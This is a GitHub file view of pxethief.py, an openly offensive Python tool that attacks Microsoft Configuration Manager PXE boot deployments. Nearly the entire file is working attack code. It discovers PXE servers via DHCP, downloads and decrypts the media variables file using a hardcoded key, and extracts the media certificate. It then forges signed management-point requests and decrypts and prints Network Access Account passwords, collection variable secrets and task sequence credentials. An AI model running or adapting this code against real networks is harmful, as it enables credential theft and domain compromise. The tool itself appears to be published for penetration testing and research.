-
Notifications
You must be signed in to change notification settings - Fork 48
/
pxethief.py
950 lines (759 loc) · 46.3 KB
/
pxethief.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
# Copyright (C) 2022 Christopher Panayi, MWR CyberSec
#
# This file is part of PXEThief (https://github.com/MWR-CyberSec/PXEThief).
#
# PXEThief is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, version 3 of the License.
#
# PXEThief is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with PXEThief. If not, see <https://www.gnu.org/licenses/>.
from scapy.all import *
import binascii
import string
import ipaddress
import socket
import platform
import configparser
import media_variable_file_cryptography as media_crypto
import math
import lxml.etree as ET
import requests
from requests_toolbelt import MultipartEncoder,MultipartDecoder
import zlib
import datetime
from os import walk,system
from ipaddress import IPv4Network,IPv4Address
if platform.system().lower().startswith('win'):
import win32crypt
#Scapy global variables
osName = platform.system()
clientIPAddress = ""
clientMacAddress = ""
#HTTP Configuration Options
USING_PROXY = False #Configure proxying for debugging support
USING_TLS = False #HTTPS and client certificate support
CERT_FILE = "output.crt"
KEY_FILE = "output-key.key"
# MECM Task Sequence Config Options
SCCM_BASE_URL = "" #The beginning of the DP URL as read from settings.ini; takes precedence over the value retrieved from the media file in decrypt_media_file(), if needed
# Debug Config Options
DUMP_MPKEYINFORMATIONMEDIA_XML = False
DUMP_REPLYASSIGNMENTS_XML = False
DUMP_POLICIES = False
DUMP_TS_XML = False
DUMP_TS_Sequence_XML = False
# Global Variables
BLANK_PASSWORDS_FOUND = False
def validate_ip_or_resolve_hostname(input):
try:
ipaddress.ip_address(input)
ip_address = input
except:
try:
ip_address = socket.gethostbyname(input.strip())
except:
print("[-] " + input + " does not appear to be a valid hostname or IP address (or DNS does not resolve)")
sys.exit(0)
return ip_address
def print_interface_table():
print("[!] Set the interface to be used by scapy in manual_interface_selection_by_id in the settings.ini file")
print()
print("Available Interfaces:")
print(conf.ifaces)
def get_config_section(section_name):
config = configparser.ConfigParser(allow_no_value=True)
config.read('settings.ini')
return config[section_name]
def configure_scapy_networking(ip_address):
#If user has provided a target IP address, use it to determine interface to send traffic out of
if ip_address is not None:
ip_address = validate_ip_or_resolve_hostname(ip_address)
route_info = conf.route.route(ip_address,verbose=0)
interface_ip = route_info[1]
if interface_ip != "0.0.0.0":
conf.iface = route_info[0]
else:
print("[-] No route found to target host " + ip_address)
sys.exit(-1)
else:
#Automatically attempt sane interface configuration
config = configparser.ConfigParser(allow_no_value=True)
config.read('settings.ini')
scapy_config = config["SCAPY SETTINGS"]
if scapy_config.get("manual_interface_selection_by_id"):
try:
manual_selection_mode_id = scapy_config.getint("manual_interface_selection_by_id")
except:
print("Invalid value set for 'manual_interface_selection_by_id' in 'settings.ini' file. Please specify an integer associated with the desired interface, or leave the field blank for automatic interface selection")
print("Valid interfaces and interface indexes can be checked by running pxethief.py 10")
sys.exit(-1)
else:
manual_selection_mode_id = None
if manual_selection_mode_id:
print("[+] Attemting to use Interface ID " + str(manual_selection_mode_id) + " provided in setttings.ini")
conf.iface = conf.ifaces.dev_from_index(manual_selection_mode_id)
else:
print("[+] Attemting automatic interface detection")
selection_mode = scapy_config.getint("automatic_interface_selection_mode")
# 1 - Use interface that can reach default GW as output interface, 2 - First interface with no autoconfigure or localhost IP address
try_next_mode = False
if selection_mode == 1:
default_gw = conf.route.route("0.0.0.0",verbose=0)
default_gw_ip = conf.route.route("0.0.0.0",verbose=0)[2]
#If there is a default gw found, set scapy to use that interface
if default_gw_ip != '0.0.0.0':
conf.iface = default_gw[0]
else:
try_next_mode = True
if selection_mode == 2 or try_next_mode:
loopback_range = IPv4Network('127.0.0.0/8')
autoconfigure_ranges = IPv4Network('169.254.0.0/16')
interfaces = scapy.interfaces.get_working_ifaces()
for interface in interfaces:
#Read IP from interface
ip = get_if_raw_addr(interface)
if ip:
ip = IPv4Address(inet_ntop(socket.AF_INET, ip))
else:
continue
#If it is a valid IP and is not a loopback or autoconfigure IP, use this interface
if ip and not (ip in loopback_range) and not (ip in autoconfigure_ranges):
conf.iface = interface
break
#Implement check on conf.iface value
global clientIPAddress
global clientMacAddress
clientIPAddress = get_if_addr(conf.iface)
fam,clientMacAddress = get_if_raw_hwaddr(conf.iface)
bind_layers(UDP,BOOTP,dport=4011,sport=68) # Make Scapy aware that, indeed, DHCP traffic *can* come from source or destination port udp/4011 - the additional port used by MECM
bind_layers(UDP,BOOTP,dport=68,sport=4011)
print("[+] Using interface: " + conf.iface + " - " + conf.iface.description)
# Find PXE server with DHCP discover packet with the right options set
def find_pxe_server():
print("")
print("Sending initial DHCP Discover to find PXE boot server...")
print("")
#DHCP Discover packet is from IP 0.0.0.0, with destination 255.255.255.255 and ff:ff:ff:ff:ff:ff destination MAC address. Need to ask for DHCP options 66 and 67 to find PXE servers
pkt = Ether(dst="ff:ff:ff:ff:ff:ff")/IP(src="0.0.0.0",dst="255.255.255.255")/UDP(sport=68,dport=67)/BOOTP(chaddr=clientMacAddress)/DHCP(options=[("message-type","discover"),('param_req_list',[1,3,6,66,67]),"end"])
conf.checkIPaddr = False # Make scapy ignore IP address when checking for responses (needed because we sent to a broadcast address)
ans = srp1(pkt) #This could fail if multiple DHCP servers exist in the environment and only some of them offer the PXE server in their response
conf.checkIPaddr = True
#TODO: Make sure received packet is a DHCP packet, before next bit of code
if ans:
packet = ans
# Pull out DHCP offer from received answer packet
dhcp_options = packet[1][DHCP].options
tftp_server = next((opt[1] for opt in dhcp_options if isinstance(opt, tuple) and opt[0] == "tftp_server_name"),None)
if tftp_server:
tftp_server = tftp_server.rstrip(b"\0").decode("utf-8") # DHCP option 66 is TFTP Server Name
boot_file = next((opt[1] for opt in dhcp_options if isinstance(opt, tuple) and opt[0] == "boot-file-name"),None)
if boot_file:
boot_file = boot_file.rstrip(b"\0").decode("utf-8") # DHCP option 67 is Bootfile Name
else:
print("[-] No DHCP responses received with PXE boot options")
sys.exit(-1)
tftp_server = validate_ip_or_resolve_hostname(tftp_server.strip())
print("")
print("PXE Server IP: " + tftp_server + " Boot File Location: " + boot_file)
return tftp_server
# Ask SCCM for location to download variable file. This is done with a DHCP Request packet
def get_variable_file_path(tftp_server):
print("")
print("[+] Asking ConfigMgr for location to download the media variables and BCD files...")
print("")
#Media Variable file is generated by sending DHCP request packet to port 4011 on a PXE enabled DP. This contains DHCP options 60, 93, 97 and 250
pkt = IP(src=clientIPAddress,dst=tftp_server)/UDP(sport=68,dport=4011)/BOOTP(ciaddr=clientIPAddress,chaddr=clientMacAddress)/DHCP(options=[
("message-type","request"),
('param_req_list',[3, 1, 60, 128, 129, 130, 131, 132, 133, 134, 135]),
('pxe_client_architecture', b'\x00\x00'), #x86 architecture
(250,binascii.unhexlify("0c01010d020800010200070e0101050400000011ff")), #x64 private option
#(250,binascii.unhexlify("0d0208000e010101020006050400000006ff")), #x86 private option
('vendor_class_id', b'PXEClient'),
('pxe_client_machine_identifier', b'\x00*\x8cM\x9d\xc1lBA\x83\x87\xef\xc6\xd8s\xc6\xd2'), #included by the client, but doesn't seem to be necessary in WDS PXE server configurations
"end"])
ans = sr1(pkt,timeout=10,iface=conf.iface,verbose=2,filter="udp port 4011 or udp port 68") # sr return value: ans,unans/packetpair1,packetpair2 (i.e. PacketPairList)/sent packet,received packet/Layers(Ethernet,IP,UDP/TCP,BOOTP,DHCP)
#TODO: Make sure received packets are DHCP packets before next bit of code
encrypted_key = None
if ans:
packet = ans
dhcp_options = packet[1][DHCP].options
#Does the received packet contain DHCP Option 243? DHCP option 243 is used by SCCM to send the variable file location
option_number, variables_file = next(opt for opt in dhcp_options if isinstance(opt, tuple) and opt[0] == 243)
if variables_file:
packet_type = variables_file[0] #First byte of the option data determines the type of data that follows
data_length = variables_file[1] #Second byte of the option data is the length of data that follows
#If the first byte is set to 1, this is the location of the encrypted media file on the TFTP server (variables.dat)
if packet_type == 1:
#Skip first two bytes of option and copy the file name by data_length
variables_file = variables_file[2:2+data_length]
variables_file = variables_file.decode('utf-8')
#If the first byte is set to 2, this is the encrypted key stream that is used to encrypt the media file. The location of the media file follows later in the option field
elif packet_type == 2:
#Skip first two bytes of option and copy the encrypted data by data_length
encrypted_key = variables_file[2:2+data_length]
#Get the index of data_length of the variables file name string in the option, and index of where the string begins
string_length_index = 2 + data_length + 1
beginning_of_string_index = 2 + data_length + 2
#Read out string length
string_length = variables_file[string_length_index]
#Read out variables.dat file name and decode to utf-8 string
variables_file = variables_file[beginning_of_string_index:beginning_of_string_index+string_length]
variables_file = variables_file.decode('utf-8')
bcd_file = next(opt[1] for opt in dhcp_options if isinstance(opt, tuple) and opt[0] == 252).rstrip(b"\0").decode("utf-8") # DHCP option 252 is used by SCCM to send the BCD file location
else:
print("[-] No variable file location (DHCP option 243) found in the received packet when the PXE boot server was prompted for a download location")
sys.exit(-1)
else:
print("[-] No DHCP responses recieved from MECM server " + tftp_server + ". This may indicate that the wrong IP address was provided or that there are firewall restrictions blocking DHCP packets to the required ports")
sys.exit(-1)
print("")
print("[!] Variables File Location: " + variables_file)
print("[!] BCD File Location: " + bcd_file)
if encrypted_key:
global BLANK_PASSWORDS_FOUND
BLANK_PASSWORDS_FOUND = True
print("[!] Blank password on PXE boot found!")
return [variables_file,bcd_file,encrypted_key]
else:
return [variables_file,bcd_file]
def get_pxe_files(ip):
if ip != None:
print("[+] Targeting user-specified host: " + ip)
tftp_server_ip = validate_ip_or_resolve_hostname(ip)
else:
print("[+] Discovering PXE Server through DHCP...")
tftp_server_ip = find_pxe_server()
print("[+] PXE Server found from DHCP at " + tftp_server_ip + "!")
answer_array = get_variable_file_path(tftp_server_ip)
variables_file = answer_array[0]
bcd_file = answer_array[1]
if BLANK_PASSWORDS_FOUND:
encrypted_key = answer_array[2]
tftp_download_string = ""
#TFTP works over UDP by having a client pick a random source port to send the request for a file from. The server then connects back to the client on this selected source port to transmit the selected data that is then acknowledged by the client. Full bidirectional comms is required between the server on port 69 and the selected ephemeral ports on the server and client in order for a transfer to complete successfully
if osName == "Windows":
var_file_download_cmd = "tftp -i " + tftp_server_ip + " GET " + "\"" + variables_file + "\"" + " " + "\"" + variables_file.split("\\")[-1] + "\"\n"
var_file_name = variables_file.split("\\")[-1]
tftp_download_string = ("tftp -i " + tftp_server_ip + " GET " + "\"" + variables_file + "\"" + " " + "\"" + variables_file.split("\\")[-1] + "\"\n" +
"tftp -i " + tftp_server_ip + " GET " + "\"" + bcd_file + "\"" + " " + "\"" + bcd_file.split("\\")[-1] + "\"")
else:
var_file_download_cmd = "tftp -m binary " + tftp_server_ip + " -c get " + "\"" + variables_file + "\"" + " " + "\"" + variables_file.split("\\")[-1] + "\"\n"
tftp_download_string = var_file_download_cmd + "tftp -m binary " + tftp_server_ip + " -c get " + "\"" + bcd_file + "\"" + " " + "\"" + bcd_file.split("\\")[-1] + "\""
var_file_name = variables_file.split("\\")[-1]
'''
print("Or, if you have atftp installed: ")
print("")
tftp_download_string = ("atftp --option \"blksize 1428\" --verbose " +
tftp_server_ip +
" << _EOF_\n" +
"mode octet\n" +
"get " + variables_file + " " + variables_file.split("\\")[-1] + "\n" +
"get " + bcd_file + " " + bcd_file.split("\\")[-1] + "\n" +
"quit\n" +
"_EOF_\n" )
'''
print("[+] Use this command to grab the files: ")
print(tftp_download_string)
if BLANK_PASSWORDS_FOUND:
config = configparser.ConfigParser(allow_no_value=True)
config.read('settings.ini')
general_config = config["GENERAL SETTINGS"]
auto_exploit_blank_password = general_config.getint("auto_exploit_blank_password")
if auto_exploit_blank_password:
print("[!] Attempting automatic exploitation. Note that this will require the default tftp client to be installed (on Windows, this can be found under Windows Features), and this will be run with os.system")
os.system(var_file_download_cmd)
use_encrypted_key(encrypted_key,var_file_name)
else:
print("[!] Change auto_exploit_blank_password in settings.ini to 1 to attempt exploitation of blank password")
else:
print("[+] User configured password detected for task sequence media. Attempts can be made to crack this password using the relevant hashcat module")
def generateSignedData(data,cryptoProv):
#SHA1 hash algorithm
sha1hash = cryptoProv.CryptCreateHash(32772,None)
sha1hash.CryptHashData(data)
#Call CryptSignHash with AT_KEYEXCHANGE, CRYPT_NOHASHOID
out = sha1hash.CryptSignHash(1,1)
return binascii.hexlify(out).decode()
def generateClientTokenSignature(data,cryptoProv):
#SHA256 hash algorithm
sha256hash = cryptoProv.CryptCreateHash(32780,None)
sha256hash.CryptHashData(data)
#Call CryptSignHash with AT_KEYEXCHANGE, CRYPT_NOHASHOID
out = sha256hash.CryptSignHash(1,1)
return binascii.hexlify(out).decode()
def deobfuscate_credential_string(credential_string):
#print(credential_string)
key_data = binascii.unhexlify(credential_string[8:88])
encrypted_data = binascii.unhexlify(credential_string[128:])
key = media_crypto.aes_des_key_derivation(key_data)
last_16 = math.floor(len(encrypted_data)/8)*8
return media_crypto._3des_decrypt(encrypted_data[:last_16],key[:24])
def decrypt_media_file(path, password):
password_is_string = True
print("[+] Media variables file to decrypt: " + path)
if type(password) == str:
password_is_string = True
print("[+] Password provided: " + password)
else:
password_is_string = False
print("[+] Password bytes provided: 0x" + password.hex())
# Decrypt encryted media variables file
encrypted_file = media_crypto.read_media_variable_file(path)
try:
if password_is_string:
key = media_crypto.aes_des_key_derivation(password.encode("utf-16-le"))
else:
key = media_crypto.aes_des_key_derivation(password)
last_16 = math.floor(len(encrypted_file)/16)*16
decrypted_media_file = media_crypto.aes128_decrypt(encrypted_file[:last_16],key[:16])
decrypted_media_file = decrypted_media_file[:decrypted_media_file.rfind('\x00')]
wf_decrypted_ts = "".join(c for c in decrypted_media_file if c.isprintable())
print("[+] Successfully decrypted media variables file with the provided password!")
#write_to_file("ts_media_variables",wf_decrypted_ts)
except:
print("[-] Failed to decrypt media variables file. Check the password provided is correct")
sys.exit(-1)
return wf_decrypted_ts
def process_pxe_bootable_and_prestaged_media(media_xml):
#Parse media file in order to pull out PFX password and PFX bytes
root = ET.fromstring(media_xml.encode("utf-16-le"))
smsMediaGuid = root.find('.//var[@name="_SMSMediaGuid"]').text
smsTSMediaPFX = root.find('.//var[@name="_SMSTSMediaPFX"]').text
global SCCM_BASE_URL
if SCCM_BASE_URL == "":
print("[+] Identifying Management Point URL from media variables (Subsequent requests may fail if DNS does not resolve!)")
#Partial Media - SMSTSLocationMPs
SMSTSMP = root.find('.//var[@name="SMSTSMP"]')
SMSTSLocationMPs = root.find('.//var[@name="SMSTSLocationMPs"]')
if SMSTSMP is not None:
SCCM_BASE_URL = SMSTSMP.text
elif SMSTSLocationMPs is not None:
SCCM_BASE_URL = SMSTSLocationMPs.text
print("[+] Management Point URL set to: " + SCCM_BASE_URL)
else:
print("[+] Using manually set Management Point URL of: " + SCCM_BASE_URL)
dowload_and_decrypt_policies_using_certificate(smsMediaGuid,smsTSMediaPFX)
def process_full_media(password, policy):
encrypted_policy = media_crypto.read_media_variable_file(policy)
try:
print("[+] Password provided for policy decryption: " + password)
key = media_crypto.aes_des_key_derivation(password.encode("utf-16-le"))
last_16 = math.floor(len(encrypted_policy)/16)*16
decrypted_ts = media_crypto.aes128_decrypt(encrypted_policy[:last_16],key[:16])
decrypted_ts = decrypted_ts[:decrypted_ts.rfind('\x00')]
wf_decrypted_ts = "".join(c for c in decrypted_ts if c.isprintable())
print("[+] Successfully Decrypted Policy \"" + policy +"\"!")
except:
print("[-] Failed to decrypt policy")
sys.exit(-1)
process_task_sequence_xml(wf_decrypted_ts)
process_naa_xml(wf_decrypted_ts)
def use_encrypted_key(encrypted_key, media_file_path):
#ProxyDHCP Option 243
length = encrypted_key[0]
encrypted_bytes = encrypted_key[1:1+length] # pull out 48 bytes that relate to the encrypted bytes in the DHCP response
encrypted_bytes = encrypted_bytes[20:-12] # isolate encrypted data bytes
key_data = b'\x9F\x67\x9C\x9B\x37\x3A\x1F\x48\x82\x4F\x37\x87\x33\xDE\x24\xE9' #Harcoded in tspxe.dll
key = media_crypto.aes_des_key_derivation(key_data) # Derive key to decrypt key bytes in the DHCP response
var_file_key = (media_crypto.aes128_decrypt_raw(encrypted_bytes[:16],key[:16])[:10]) # 10 byte output, can be padded (appended) with 0s to get to 16 struct.unpack('10c',var_file_key)
#Perform bit extension
LEADING_BIT_MASK = b'\x80'
new_key = bytearray()
for byte in struct.unpack('10c',var_file_key):
if (LEADING_BIT_MASK[0] & byte[0]) == 128:
new_key = new_key + byte + b'\xFF'
else:
new_key = new_key + byte + b'\x00'
media_variables = decrypt_media_file(media_file_path,new_key)
print("[!] Writing media variables to variables.xml")
write_to_file("variables",media_variables)
#Parse media file in order to pull out PFX password and PFX bytes
root = ET.fromstring(media_variables.encode("utf-16-le"))
smsMediaSiteCode = root.find('.//var[@name="_SMSTSSiteCode"]').text
smsMediaGuid = (root.find('.//var[@name="_SMSMediaGuid"]').text)[:31]
smsTSMediaPFX = binascii.unhexlify(root.find('.//var[@name="_SMSTSMediaPFX"]').text)
filename = smsMediaSiteCode + "_" + smsMediaGuid +"_SMSTSMediaPFX.pfx"
print("[!] Writing _SMSTSMediaPFX to "+ filename + ". Certificate password is " + smsMediaGuid)
write_to_binary_file(filename,smsTSMediaPFX)
if osName == "Windows":
process_pxe_bootable_and_prestaged_media(media_variables)
else:
print("[!] This tool uses win32crypt to retrieve passwords from MECM, which is not available on non-Windows platforms")
#Parse the downloaded task sequences and extract sensitive data if present
def dowload_and_decrypt_policies_using_certificate(guid,cert_bytes):
smsMediaGuid = guid
#CCMClientID header is equal to smsMediaGuid from the decrypted media file
CCMClientID = smsMediaGuid
smsTSMediaPFX = binascii.unhexlify(cert_bytes)
#Import decrypted PFX and initialise Windows Crypto functions
certStore = win32crypt.PFXImportCertStore(smsTSMediaPFX,smsMediaGuid[:31],4096) #CRYPT_USER_KEYSET
certEnum = certStore.CertEnumCertificatesInStore()
certKeyContext = certEnum[0].CertGetCertificateContextProperty(2)
cryptoProv = win32crypt.CryptAcquireContext(certKeyContext["ContainerName"],certKeyContext["ProvName"],certKeyContext["ProvType"],0)
print('[+] Successfully Imported PFX File into Windows Certificate Store!')
decryptPara = {}
decryptPara["CertStores"]=[certStore]
print('[+] Generating Client Authentication headers using PFX File...')
data = CCMClientID.encode("utf-16-le") + b'\x00\x00'
#CCMClientIDSignature = generateSignedData(data,cryptoProv)
CCMClientIDSignature = str(generateClientTokenSignature(data,cryptoProv))
print("[+] CCMClientID Signature Generated")
CCMClientTimestamp = datetime.datetime.utcnow().replace(microsecond=0).isoformat()+'Z'
data = CCMClientTimestamp.encode("utf-16-le") + b'\x00\x00'
#CCMClientTimestampSignature = generateSignedData(data,cryptoProv)
CCMClientTimestampSignature = str(generateClientTokenSignature(data,cryptoProv))
print("[+] CCMClientTimestamp Signature Generated")
data = (CCMClientID + ';' + CCMClientTimestamp + "\0").encode("utf-16-le")
#clientTokenSignature = str(generateSignedData(data,cryptoProv))
clientTokenSignature = str(generateClientTokenSignature(data,cryptoProv))
print("[+] ClientToken Signature Generated")
try:
naaConfigs, tsConfigs, colsettings = make_all_http_requests_and_retrieve_sensitive_policies(CCMClientID,CCMClientIDSignature,CCMClientTimestamp,CCMClientTimestampSignature,clientTokenSignature)
except Exception as e:
print("If you encountered errors at this point, it is likely as a result of one of two things: a) network connectivity or b) the signing algorithm")
print()
print("Fix network connectivity issues by ensuring you can connect to the HTTP port on the server and fixing DNS issues or by using the SCCM_BASE_URL to hardcode the beginning of the URL used to access the MP: e.g. http://192.168.56.101")
print()
print("The SHA1 signing algorithm is implemented by generateSignedData and the SHA256 signing algorithm is implemented by generateClientTokenSignature")
print("If you encountered errors, for CCMClientIDSignature, CCMClientTimestampSignature and clientTokenSignature change the current signing algorithm to the one not in use")
print(e)
sys.exit(-1)
for colsetting in colsettings:
print("\n[+] Collection Variables found for 'All Unknown Computers' collection!")
#Check to see if Collection Variables are encrypted
data = False
try:
data = colsetting.content.decode("utf-16-le")
data = True
except (UnicodeDecodeError, AttributeError):
#print("a") #Will hit this code branch if running over cleartext and the collection variables are not encrypted
pass
if USING_TLS or data:
wf_dstr = colsetting.content.decode("utf-16-le")
else:
dstr,cert_used = win32crypt.CryptDecryptMessage(decryptPara,colsetting.content)
dstr = dstr.decode("utf-16-le")
wf_dstr = "".join(c for c in dstr if c.isprintable())
#print(wf_dstr)
root = ET.fromstring(wf_dstr)
dstr = zlib.decompress(binascii.unhexlify(root.text)).decode("utf-16-le")
wf_dstr = "".join(c for c in dstr if c.isprintable())
write_to_file("CollectionSettings", wf_dstr)
#wf_dstr = dstr[dstr.find('<')-1:dstr.rfind('>')+1]
root = ET.fromstring(wf_dstr)
instances = root.find("PolicyRule").find("PolicyAction").findall("instance")
for instance in instances:
encrypted_collection_var_secret = instance.xpath(".//*[@name='Value']/value")[0].text
collection_var_name = instance.xpath(".//*[@name='Name']/value")[0].text
print("\n[!] Collection Variable Name: '" + collection_var_name +"'")
collection_var_secret = deobfuscate_credential_string(encrypted_collection_var_secret)
collection_var_secret = collection_var_secret[:collection_var_secret.rfind('\x00')]
print("[!] Collection Variable Secret: '" + collection_var_secret + "'")
print("\n[+] Decrypting Network Access Account Configuration")
for naaConfig in naaConfigs:
if USING_TLS:
dstr = naaConfig.content.decode("utf-16-le")
else:
dstr,cert_used = win32crypt.CryptDecryptMessage(decryptPara,naaConfig.content)
dstr = dstr.decode("utf-16-le")
wf_dstr = "".join(c for c in dstr if c.isprintable())
process_naa_xml(wf_dstr)
print()
print("[+] Decrypting Task Sequence Configuration\n")
for tsConfig in tsConfigs:
if USING_TLS:
dstr = tsConfig.content.decode("utf-16-le")
else:
dstr,cert_used = win32crypt.CryptDecryptMessage(decryptPara,tsConfig.content)
dstr = dstr.decode("utf-16-le")
wf_dstr = "".join(c for c in dstr if c.isprintable())
tsSequence = process_task_sequence_xml(wf_dstr)
#Clean up code
print("[+] Cleaning up")
win32crypt.CryptAcquireContext(certKeyContext["ContainerName"],certKeyContext["ProvName"],certKeyContext["ProvType"],16)
cryptoProv.CryptReleaseContext()
certStore.CertCloseStore()
def process_naa_xml(naa_xml):
print("[+] Extracting password from Decrypted Network Access Account Configuration\n")
root = ET.fromstring(naa_xml)
network_access_account_xml = root.xpath("//*[@class='CCM_NetworkAccessAccount']")
for naa_settings in network_access_account_xml:
network_access_username = deobfuscate_credential_string(naa_settings.xpath(".//*[@name='NetworkAccessUsername']")[0].find("value").text)
network_access_username = network_access_username[:network_access_username.rfind('\x00')]
print("[!] Network Access Account Username: '" + network_access_username + "'")
network_access_password = deobfuscate_credential_string(naa_settings.xpath(".//*[@name='NetworkAccessPassword']")[0].find("value").text)
network_access_password = network_access_password[:network_access_password.rfind('\x00')]
print("[!] Network Access Account Password: '" + network_access_password+"'")
def process_task_sequence_xml(ts_xml):
root = ET.fromstring(ts_xml)
pkg_name = root.xpath("//*[@name='PKG_Name']/value")[0].text
adv_id = root.xpath("//*[@name='ADV_AdvertisementID']/value")[0].text
ts_sequence_tag = root.xpath("//*[@name='TS_Sequence']/value")[0].text
tsName = pkg_name + "-" + adv_id
keepcharacters = (' ','.','_', '-')
tsName = "".join(c for c in tsName if c.isalnum() or c in keepcharacters).rstrip()
#Is TS_Sequence plaintext? This is the case when processing TS from full media and may be the case for TS transmitted over HTTPS?
if ts_sequence_tag[:9] == "<sequence":
tsSequence = ts_sequence_tag
else:
try:
tsSequence = deobfuscate_credential_string(ts_sequence_tag)
print("[!] Successfully Decrypted TS_Sequence XML Blob in Task Sequence '" + pkg_name + "'!")
except:
print("Failed to decrypt TS_Sequence in '" + pkg_name + "'. The encryption used on the SCCM server may be different than expected?")
return
tsSequence = tsSequence[:tsSequence.rfind(">")+1]
tsSequence = "".join(c for c in tsSequence if c.isprintable() or c in keepcharacters).rstrip()
if DUMP_TS_XML:
print("[!] Writing decrypted TaskSequence policy XML to 'TaskSequence_policy_" + tsName + ".xml'.")
f = open("TaskSequence_policy_" + tsName + ".xml", "w")
f.write(tsSequence)
f.close()
if DUMP_TS_Sequence_XML:
print("[!] Writing decrypted TS_Sequence XML to '" + tsName + ".xml'. This can be manually inspected for credentials")
f = open(tsName + ".xml", "w")
f.write(tsSequence)
f.close()
print("[+] Attempting to automatically identify credentials in Task Sequence '" + pkg_name + "':\n")
analyse_task_sequence_for_potential_creds(tsSequence)
def write_to_file(filename, contents):
f = open(filename + ".xml", "w")
f.write(contents)
f.close()
def write_to_binary_file(filename, contents):
f = open(filename, "wb")
f.write(contents)
f.close()
def analyse_task_sequence_for_potential_creds(ts_xml):
#Known tags: property="DomainPassword" name="OSDJoinPassword", property="DomainUsername" name="OSDJoinAccount", property="AdminPassword" name="OSDLocalAdminPassword", property="RegisteredUserName" name="OSDRegisteredUserName", property="CapturePassword" name="OSDCaptureAccountPassword", property="CaptureUsername" name="OSDCaptureAccount"
tree = ET.fromstring(ts_xml).getroottree()
keyword_list = ["password", "account", "username"]
element_search_list = []
for word in keyword_list:
# TODO search through different attributes other than name?
element_search_list.append([word, tree.xpath('//*[contains(translate(@name,"ABCDEFGHIJKLMNOPQRSTUVWXYZ","abcdefghijklmnopqrstuvwxyz"),"' + word +'")]')])
parent_list = []
creds_found = False
for word, elements in element_search_list:
for element in elements:
if not creds_found:
print("[!] Possible credential fields found!\n")
creds_found = True
parent = element.getparent() # TODO if parent is defaultvarlist
if parent not in parent_list:
parent_list.append(parent)
print("In TS Step \"" + parent.getparent().attrib["name"]+"\":")
unique_words = [x for x in keyword_list if x != word]
par = ET.ElementTree(parent)
for unique_word in unique_words:
for el in par.xpath('//*[contains(translate(@name,"ABCDEFGHIJKLMNOPQRSTUVWXYZ","abcdefghijklmnopqrstuvwxyz"),"' + unique_word + '")]'):
if el != element: #duplicate tags that match more than one keyword
print(el.attrib["name"] + " - " + el.text)
print(element.attrib["name"] + " - " + str(element.text))
print()
if not creds_found:
print("[!] No credentials identified in this Task Sequence.\n")
#print("[!] Look through it for credentials by searching for tags and properties with the words 'Account', 'Username', 'Password'")
